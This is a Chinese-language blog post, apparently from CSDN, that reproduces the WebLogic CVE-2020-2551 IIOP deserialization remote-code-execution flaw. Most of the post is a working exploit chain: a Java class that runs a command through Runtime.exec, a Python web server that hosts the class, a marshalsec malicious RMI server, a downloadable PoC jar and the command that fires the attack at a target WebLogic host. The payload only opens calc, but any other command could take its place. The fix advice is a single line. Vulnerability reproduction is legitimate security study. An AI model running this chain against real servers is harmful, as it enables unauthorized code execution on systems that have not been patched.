Weblogic CVE-2020-2551 IIOP反序列化漏洞复现

漏洞概述

 

攻击者可以通过IIOP协议远程访问Weblogic Server服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。

IIOP协议以Java接口的形式对远程对象进行访问,默认启用。

 

影响版本

 

weblogic 10.3.6

weblogic 12.1.3.0

weblogic 12.2.1.3.0

weblogic 12.2.1.4.0

 

 

环境搭建

 

下载地址

https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

 

漏洞复现

 

访问http://your-ip:7001/console看到页面

构造如下java,保存为exp.java

import java.io.IOException;
public class exp {
	static{
		try {
			java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});
		} catch (IOException e) {
			e.printStackTrace();
		}
	}
	public static void main(String[] args) {
		
	}
}

编译生成exp.class
javac exp.java -source 1.6 -target 1.6
启动web服务
python -m SimpleHTTPServer 80

使用marshalsec起一个恶意的RMI服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.0.103/#exp” 1099

Poc下载地址

https://pan.baidu.com/s/1WancKEtKzXDxwWP0zz3QPg

漏洞攻击,成功弹出calc

java -jar weblogic_CVE_2020_2551.jar 192.168.0.103 7001 rmi://192.168.0.103:1099/exp

 

修复建议

 

升级到安全版本

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 终极编程指南 设计师:CSDN官方博客 返回首页